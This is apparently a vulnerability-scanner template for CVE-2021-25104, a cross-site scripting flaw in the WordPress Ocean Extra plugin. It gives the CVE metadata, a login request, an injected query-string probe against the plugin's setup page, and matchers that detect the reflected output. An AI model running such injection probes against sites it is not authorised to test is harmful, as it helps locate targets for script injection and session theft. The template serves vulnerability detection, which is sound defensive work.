id: CVE-2021-25104 info: name: WordPress Ocean Extra <1.9.5 - Cross-Site Scripting author: Akincibor severity: medium description: WordPress Ocean Extra plugin before 1.9.5 contains a cross-site scripting vulnerability. The plugin does not escape generated links which are then used when the OceanWP theme is active. impact: | Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: Fixed in version 1.9.5. reference: - https://wpscan.com/vulnerability/2ee6f1d8-3803-42f6-9193-3dd8f416b558 - https://wordpress.org/plugins/ocean-extra/ - https://nvd.nist.gov/vuln/detail/CVE-2021-25104 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2021-25104 cwe-id: CWE-79 epss-score: 0.00106 epss-percentile: 0.42838 cpe: cpe:2.3:a:oceanwp:ocean_extra:*:*:*:*:*:wordpress:*:* metadata: verified: true max-request: 2 vendor: oceanwp product: ocean_extra framework: wordpress tags: cve,cve2021,wordpress,xss,wp-plugin,authenticated,wpscan,wp,ocean-extra,oceanwp http: - raw: - | POST /wp-login.php HTTP/1.1 Host: {{Hostname}} Origin: {{RootURL}} Content-Type: application/x-www-form-urlencoded Cookie: wordpress_test_cookie=WP%20Cookie%20check log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 - | GET /wp-admin/?step=demo&page=owp_setup&a"> HTTP/1.1 Host: {{Hostname}} matchers-condition: and matchers: - type: word part: body words: - 'OceanWP' - '>' condition: and - type: word part: header words: - text/html - type: status status: - 200 # digest: 4a0a00473045022039845b9f201901053b98dc8c7eed178495a70cfe5050c0ad8c9411f8db441999022100d7665d10ad64f4e2c8b5637b3b40c8aacdfffcb285c9dd03ce0840968e6b1b7d:922c64590222798bb761d5b6d8e72950